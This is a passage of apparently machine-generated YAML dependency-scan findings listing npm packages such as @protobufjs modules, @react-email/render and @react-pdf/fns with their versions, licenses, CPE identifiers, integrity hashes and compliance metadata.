kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: e931437e79a085b9
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @protobufjs/aspromise 1.1.2'
|
|
title: '@protobufjs/aspromise 1.1.2'
|
|
description: 'Package discovered: @protobufjs/aspromise 1.1.2'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 503ecf3ae2d5a446
|
|
name: '@protobufjs/aspromise'
|
|
version: 1.1.2
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: BSD-3-Clause
|
|
spdxExpression: BSD-3-Clause
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@protobufjs\/aspromise:\@protobufjs\/aspromise:1.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40protobufjs/aspromise@1.1.2
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@protobufjs/aspromise/-/aspromise-1.1.2.tgz
|
|
integrity: sha512-j+gKExEuLmKwvz3OgROXtrJ2UG2x8Ch2YZUxahh+s1F2HZ+wAceUNLkvy6zKCPVRkU++ZWQrdxsUeQXmcg4uoQ==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: e4bf388f995dc845
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @protobufjs/base64 1.1.2'
|
|
title: '@protobufjs/base64 1.1.2'
|
|
description: 'Package discovered: @protobufjs/base64 1.1.2'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 493d13966d12b3a0
|
|
name: '@protobufjs/base64'
|
|
version: 1.1.2
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: BSD-3-Clause
|
|
spdxExpression: BSD-3-Clause
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@protobufjs\/base64:\@protobufjs\/base64:1.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40protobufjs/base64@1.1.2
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@protobufjs/base64/-/base64-1.1.2.tgz
|
|
integrity: sha512-AZkcAA5vnN/v4PDqKyMR5lx7hZttPDgClv83E//FMNhR2TMcLUhfRUBHCmSl0oi9zMgDDqRUJkSxO3wm85+XLg==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: fad1d6a5684086d4
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @protobufjs/codegen 2.0.5'
|
|
title: '@protobufjs/codegen 2.0.5'
|
|
description: 'Package discovered: @protobufjs/codegen 2.0.5'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 12a6d95fe5a62fc1
|
|
name: '@protobufjs/codegen'
|
|
version: 2.0.5
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: BSD-3-Clause
|
|
spdxExpression: BSD-3-Clause
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@protobufjs\/codegen:\@protobufjs\/codegen:2.0.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40protobufjs/codegen@2.0.5
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@protobufjs/codegen/-/codegen-2.0.5.tgz
|
|
integrity: sha512-zgXFLzW3Ap33e6d0Wlj4MGIm6Ce8O89n/apUaGNB/jx+hw+ruWEp7EwGUshdLKVRCxZW12fp9r40E1mQrf/34g==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: efbb149e9a326e2c
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @protobufjs/eventemitter 1.1.0'
|
|
title: '@protobufjs/eventemitter 1.1.0'
|
|
description: 'Package discovered: @protobufjs/eventemitter 1.1.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 7097fcb2aeb00411
|
|
name: '@protobufjs/eventemitter'
|
|
version: 1.1.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: BSD-3-Clause
|
|
spdxExpression: BSD-3-Clause
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@protobufjs\/eventemitter:\@protobufjs\/eventemitter:1.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40protobufjs/eventemitter@1.1.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@protobufjs/eventemitter/-/eventemitter-1.1.0.tgz
|
|
integrity: sha512-j9ednRT81vYJ9OfVuXG6ERSTdEL1xVsNgqpkxMsbIabzSo3goCjDIveeGv5d03om39ML71RdmrGNjG5SReBP/Q==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 817b2c8a979dff10
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @protobufjs/fetch 1.1.0'
|
|
title: '@protobufjs/fetch 1.1.0'
|
|
description: 'Package discovered: @protobufjs/fetch 1.1.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 4ed2c80c8ad8c116
|
|
name: '@protobufjs/fetch'
|
|
version: 1.1.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: BSD-3-Clause
|
|
spdxExpression: BSD-3-Clause
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@protobufjs\/fetch:\@protobufjs\/fetch:1.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40protobufjs/fetch@1.1.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@protobufjs/fetch/-/fetch-1.1.0.tgz
|
|
integrity: sha512-lljVXpqXebpsijW71PZaCYeIcE5on1w5DlQy5WH6GLbFryLUrBD4932W/E2BSpfRJWseIL4v/KPgBFxDOIdKpQ==
|
|
dependencies:
|
|
'@protobufjs/aspromise': ^1.1.1
|
|
'@protobufjs/inquire': ^1.1.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 253d6aca6c381638
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @protobufjs/float 1.0.2'
|
|
title: '@protobufjs/float 1.0.2'
|
|
description: 'Package discovered: @protobufjs/float 1.0.2'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: dda6f1aef9d11e58
|
|
name: '@protobufjs/float'
|
|
version: 1.0.2
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: BSD-3-Clause
|
|
spdxExpression: BSD-3-Clause
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@protobufjs\/float:\@protobufjs\/float:1.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40protobufjs/float@1.0.2
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@protobufjs/float/-/float-1.0.2.tgz
|
|
integrity: sha512-Ddb+kVXlXst9d+R9PfTIxh1EdNkgoRe5tOX6t01f1lYWOvJnSPDBlG241QLzcyPdoNTsblLUdujGSE4RzrTZGQ==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 7699234b047c9f55
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @protobufjs/inquire 1.1.1'
|
|
title: '@protobufjs/inquire 1.1.1'
|
|
description: 'Package discovered: @protobufjs/inquire 1.1.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: a8f805afd5f928e8
|
|
name: '@protobufjs/inquire'
|
|
version: 1.1.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: BSD-3-Clause
|
|
spdxExpression: BSD-3-Clause
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@protobufjs\/inquire:\@protobufjs\/inquire:1.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40protobufjs/inquire@1.1.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@protobufjs/inquire/-/inquire-1.1.1.tgz
|
|
integrity: sha512-mnzgDV26ueAvk7rsbt9L7bE0SuAoqyuys/sMMrmVcN5x9VsxpcG3rqAUSgDyLp0UZlmNfIbQ4fHfCtreVBk8Ew==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 0888dd200a4f8fb9
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @protobufjs/path 1.1.2'
|
|
title: '@protobufjs/path 1.1.2'
|
|
description: 'Package discovered: @protobufjs/path 1.1.2'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 742d5880151b22a5
|
|
name: '@protobufjs/path'
|
|
version: 1.1.2
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: BSD-3-Clause
|
|
spdxExpression: BSD-3-Clause
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@protobufjs\/path:\@protobufjs\/path:1.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40protobufjs/path@1.1.2
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@protobufjs/path/-/path-1.1.2.tgz
|
|
integrity: sha512-6JOcJ5Tm08dOHAbdR3GrvP+yUUfkjG5ePsHYczMFLq3ZmMkAD98cDgcT2iA1lJ9NVwFd4tH/iSSoe44YWkltEA==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 37fb5baaf891bf3b
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @protobufjs/pool 1.1.0'
|
|
title: '@protobufjs/pool 1.1.0'
|
|
description: 'Package discovered: @protobufjs/pool 1.1.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 2f9166cf527d1f74
|
|
name: '@protobufjs/pool'
|
|
version: 1.1.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: BSD-3-Clause
|
|
spdxExpression: BSD-3-Clause
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@protobufjs\/pool:\@protobufjs\/pool:1.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40protobufjs/pool@1.1.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@protobufjs/pool/-/pool-1.1.0.tgz
|
|
integrity: sha512-0kELaGSIDBKvcgS4zkjz1PeddatrjYcmMWOlAuAPwAeccUrPHdUqo/J6LiymHHEiJT5NrF1UVwxY14f+fy4WQw==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 008b4e7e3539d471
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @protobufjs/utf8 1.1.1'
|
|
title: '@protobufjs/utf8 1.1.1'
|
|
description: 'Package discovered: @protobufjs/utf8 1.1.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: afb917b3027623df
|
|
name: '@protobufjs/utf8'
|
|
version: 1.1.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: BSD-3-Clause
|
|
spdxExpression: BSD-3-Clause
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@protobufjs\/utf8:\@protobufjs\/utf8:1.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40protobufjs/utf8@1.1.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@protobufjs/utf8/-/utf8-1.1.1.tgz
|
|
integrity: sha512-oOAWABowe8EAbMyWKM0tYDKi8Yaox52D+HWZhAIJqQXbqe0xI/GV7FhLWqlEKreMkfDjshR5FKgi3mnle0h6Eg==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: b1e07271de6eec7b
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @react-email/render 0.0.16'
|
|
title: '@react-email/render 0.0.16'
|
|
description: 'Package discovered: @react-email/render 0.0.16'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: e1894e7a0de3acac
|
|
name: '@react-email/render'
|
|
version: 0.0.16
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@react-email\/render:\@react-email\/render:0.0.16:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react-email\/render:\@react_email\/render:0.0.16:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react_email\/render:\@react-email\/render:0.0.16:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react_email\/render:\@react_email\/render:0.0.16:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react:\@react-email\/render:0.0.16:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react:\@react_email\/render:0.0.16:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40react-email/render@0.0.16
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@react-email/render/-/render-0.0.16.tgz
|
|
integrity: sha512-wDaMy27xAq1cJHtSFptp0DTKPuV2GYhloqia95ub/DH9Dea1aWYsbdM918MOc/b/HvVS3w1z8DWzfAk13bGStQ==
|
|
dependencies:
|
|
html-to-text: 9.0.5
|
|
js-beautify: ^1.14.11
|
|
react-promise-suspense: 0.3.4
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 2e3b9f0f7d4d1d7f
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @react-pdf/fns 2.2.1'
|
|
title: '@react-pdf/fns 2.2.1'
|
|
description: 'Package discovered: @react-pdf/fns 2.2.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 38462ff4454997a0
|
|
name: '@react-pdf/fns'
|
|
version: 2.2.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@react-pdf\/fns:\@react-pdf\/fns:2.2.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react-pdf\/fns:\@react_pdf\/fns:2.2.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react_pdf\/fns:\@react-pdf\/fns:2.2.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react_pdf\/fns:\@react_pdf\/fns:2.2.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react:\@react-pdf\/fns:2.2.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react:\@react_pdf\/fns:2.2.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40react-pdf/fns@2.2.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@react-pdf/fns/-/fns-2.2.1.tgz
|
|
integrity: sha512-s78aDg0vDYaijU5lLOCsUD+qinQbfOvcNeaoX9AiE7+kZzzCo6B/nX+l48cmt9OosJmvZvE9DWR9cLhrhOi2pA==
|
|
dependencies:
|
|
'@babel/runtime': ^7.20.13
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 06f3ac6357300fe3
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @react-pdf/fns 3.1.3'
|
|
title: '@react-pdf/fns 3.1.3'
|
|
description: 'Package discovered: @react-pdf/fns 3.1.3'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 4656650b2a6dd236
|
|
name: '@react-pdf/fns'
|
|
version: 3.1.3
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@react-pdf\/fns:\@react-pdf\/fns:3.1.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react-pdf\/fns:\@react_pdf\/fns:3.1.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react_pdf\/fns:\@react-pdf\/fns:3.1.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react_pdf\/fns:\@react_pdf\/fns:3.1.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react:\@react-pdf\/fns:3.1.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
